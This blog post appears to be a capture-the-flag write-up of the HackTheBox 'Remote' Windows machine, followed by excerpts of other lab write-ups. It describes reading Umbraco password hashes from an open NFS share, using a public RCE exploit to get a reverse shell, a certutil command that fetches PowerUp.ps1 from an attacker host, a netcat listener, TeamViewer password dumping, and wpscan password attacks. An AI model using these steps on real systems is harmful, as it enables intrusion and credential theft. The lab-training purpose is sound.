Remote writeup | HackTheBox | by DarkRider88


This is an easy level windows machine. So, let's start..

Enumeration

First we will do the nmap scan to enumerate all the services

nmap scan to find all the ports

We got our ports and we will start by enumerating the port 80.

Just a simple lookup to the source code of the website gave us that the website is based upon Umbraco CMS and we can reach its login page using http://10.10.10.180/umbraco. But wait, we don't have any credentials yet, I tried some defaul logins but no success. So, for now lets enumerate other services.

FTP got nothing in it and the SMB serivce does not allow anonymous login. So, whats more? remember that Port 111 RPCbind.

RPCbind:

From the nmap scan's RPCinfo we can say that there are some Network File System(NFS) shares. Now we are going to enumerate further and try to list the NFS shares, if any. So here it is..

enumerating public mounts and mounting it to our local machine

Little Explanation 
  • First I used Showmount tool to extract all the publicly available shares from the box's IP.
  • Then I mounted that share to my local /mnt directory using the command show in the image.
  • NOTE: to check the CMS version you can see Web.config.
  • I researched some Umbraco's documentation to find out where the passwords for login are stored.
  • Since the passwords are stored in Umbraco.sdf which is a binary file, running cat command won't help. So I used strings and greped the "admin".
  • Then I took the hash and cracked it online and now we have email and password for login.
After logging in I saw there was nothing through which I could obtain a reverse shell. Hence, this is the right time for finding out public available vulnerabilities. 
    Here I used seachsploit to find the exploits for Umbraco 7.12.4

use searchsploit to find exploits

Amazing! we have Authenticated RCE and to exploit this I used a github available exploit Umbraco-exploit

Foothold:

Here's the plan:
  • First we will execute the exploit and send a command to execute a reverse shell.
  • For reverse shell, we will use powercat script of powershell and we'll be hosting it on our python3 server.
  • Thirdly, we will turn on our netcat for any reverse connection.
  • Well, there are many ways through which you can get the reverse shell. Check out this awesome article https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

using powercat to get reverse shell in windows

Go grab your User flag from C:\windows\Users\Public.

Privilege Escalation:

There was two attack surface for privilege escalation. First, exploit a windows service and second, TeamViewer password gathering.

For enumeration purpose upload the PowerUp.ps1 module to the victim machine and run it.
firstly host your PowerUp.ps1 script on your machine through kali, start the server in the same directory where the script is located 
use    # python3 -m http.server
On windows machine type
        # certutil.exe -urlcache -f http://your-ip:port//PowerUp.ps1 PowerUP.ps1
    
Then run the script and you will find that only one service named UsoSvc is exploitable.
for your reference: Link(payload all things)
exploit windows Usosvc service for privilege escalation

Before starting the service start your netcat (nc -lvp 8888).
But, for some reasons this method did not worked for me.

Second Method - TeamViewer:

There is a teamviewer folder in the program files and also there is public vulnerability which could be used to extract plaintext passwords from the registry stored by the Teamviewer application.

For exploiting this there was a nice Metasploit module.

running metasploit

Yayyy.. We got the password for administrator, now we will login as admin using PsExec module of Msf.


Put the appropriate options


And "I AM IN" :)

There is nothing more to this you'll find the flag in C:\windows\Users\Administrator\Desktop.
Happy Hacking
                   -DarkRider88

Comments

Post a Comment

Popular posts from this blog

THM: Blog Room Writeup

Image
Here is the link of this great room:  Blog by Nameless0ne . L et's start guys.. Enumeration First I ran the nmap scan: 1.First lets check out the Blog itself running on the port 80. From little enumeration we can say that this is a simple blog running on the Wordpress. 2. The blog contains a single post by a user named Karen Wheeler for Billy joel. 3. To enumerate the users on the blog I will be using WPscan.           wpscan --url blog.thm -e u This command will list all the users on the Blog, bjoel & kwheel. 4. Let's try to find out the password of these users using the same tool again.          wpscan -U username --password <pass file> -t 30 --password-attack wp-login --url blog.thm 5. Try to run your own command. It won't take long before the password pops. (hint: try Mom name) 6. After login into the wordpress I saw the user had very limited capabilities so there must be some other way to the shell or some k...
Read more

GamingServer | TryHackMe | by Valerie23

Image
LINK TO THE ROOM:  GamingServer NMAP SCAN Let’s do nmap first and see what do we get. nmap -Pn -sV 10.10.159.106 The results come back showing : Port 22 & 80. Since we don't have any credentials lets enumerate port 80 first. GOBUSTER  Lets fireup a gobuster scan for finding hidden directories. gobuster dir -u http://10.10.159.106/ -w /usr/share/wordlists/dirb/common.txt -t 50 WEB ANALYSIS Visiting port 80. And checking its source code gives us a username. Lets visit some of the interesting directories that we found earlier from gobuster scan. /uploads It has a dictionary list that looks like a list of passwords. So we will just copy and paste the content into a new file. And now we are going to visit another directory /secret to find the secrets. Looks like a ssh key but encrypted. In order to decrypt the ssh key we first need to copy and paste it into a file then find its password. Used commands: locate ssh2john /usr/share/john/ssh2john.py sshkey > key_hash Now the fil...
Read more

Carpe-Diem | Tryhackme | Writeup

Image
Room:  Carpe - diem  Big shout out to the creator of this room:  4ndr34z Overview:   In this room we have retrieve the key which is used to encrypt a database file stored at /downloads/database.carpe. For me this room was too challenging and hence this writeup for all the coming folks. I have tried to explain everything so that the beginners could understand it easily. Enumeration: 1. A s usual we will start with NMAP scan From port scan we found there is nothing unique or interesting running except the port 80. So we should open the website and do some enumeration. 2. This website is asking us to send proof of our bitcoin address..and only after that you can retrieve the key..(I think thats what the theme of this room .. a perfect ransomware attack) 3. After that we review the source code of the webpage and always read those javascripts. Explanation:  first this code is checking that you don't copy the same address and send to proof and if you do that it pop up...
Read more